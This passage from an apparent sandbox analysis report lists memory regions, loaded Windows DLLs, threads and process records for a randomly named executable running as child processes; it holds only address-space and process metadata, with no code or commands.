0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6261 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 6262 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 6263 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 6264 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 6265 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 6266 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 6267 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 6268 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 6269 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 6270 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 6271 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 6272 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 6273 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 6274 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 6275 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 6276 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 6277 start_va = 0x6f370000 end_va = 0x6f401fff monitored = 0 entry_point = 0x6f37dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 6278 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 6279 start_va = 0x7c0000 end_va = 0x947fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007c0000" filename = "" Region: id = 6280 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 220 os_tid = 0x131c Thread: id = 226 os_tid = 0xf88 Process: id = "65" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0xc9a7000" os_pid = "0xdb4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6281 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6282 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 6283 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6284 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 6285 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 6286 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 6287 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6288 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 6289 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 6290 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 6291 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6292 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 6293 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6294 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6295 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6296 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 6297 start_va = 0x5c0000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 6298 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6299 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6300 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6301 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6302 start_va = 0x440000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 6303 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6304 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6321 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6322 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 6323 start_va = 0x5d0000 end_va = 0x68dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6324 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 6325 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 6352 start_va = 0x440000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 6353 start_va = 0x4a0000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 6354 start_va = 0x690000 end_va = 0x78ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 6355 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 6356 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6357 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 6374 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 6375 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 6376 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 6377 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 6378 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 6379 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 6380 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 6381 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 6382 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 6383 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 6384 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 6385 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 6402 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 6403 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 6541 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 6542 start_va = 0x6f370000 end_va = 0x6f401fff monitored = 0 entry_point = 0x6f37dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 6559 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 6560 start_va = 0x790000 end_va = 0x917fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000790000" filename = "" Region: id = 6561 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 227 os_tid = 0x624 Thread: id = 230 os_tid = 0xd28 Process: id = "66" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0x6a1ac000" os_pid = "0x864" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6305 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6306 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 6307 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6308 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 6309 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 6310 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 6311 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6312 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 6313 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 6314 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 6315 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6316 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 6317 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6318 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6319 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6320 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 6326 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 6327 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6328 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6329 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6330 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6347 start_va = 0x580000 end_va = 0x77ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6348 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6349 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6350 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6351 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 6428 start_va = 0x440000 end_va = 0x4fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6445 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 6446 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 6447 start_va = 0x500000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 6448 start_va = 0x580000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 6449 start_va = 0x680000 end_va = 0x77ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 6450 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 6451 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6452 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 6453 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 6454 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 6455 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 6456 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 6473 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 6474 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 6475 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 6476 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 6678 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 6679 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 6680 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 6681 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 6682 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 6683 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 6700 start_va = 0x6f370000 end_va = 0x6f401fff monitored = 0 entry_point = 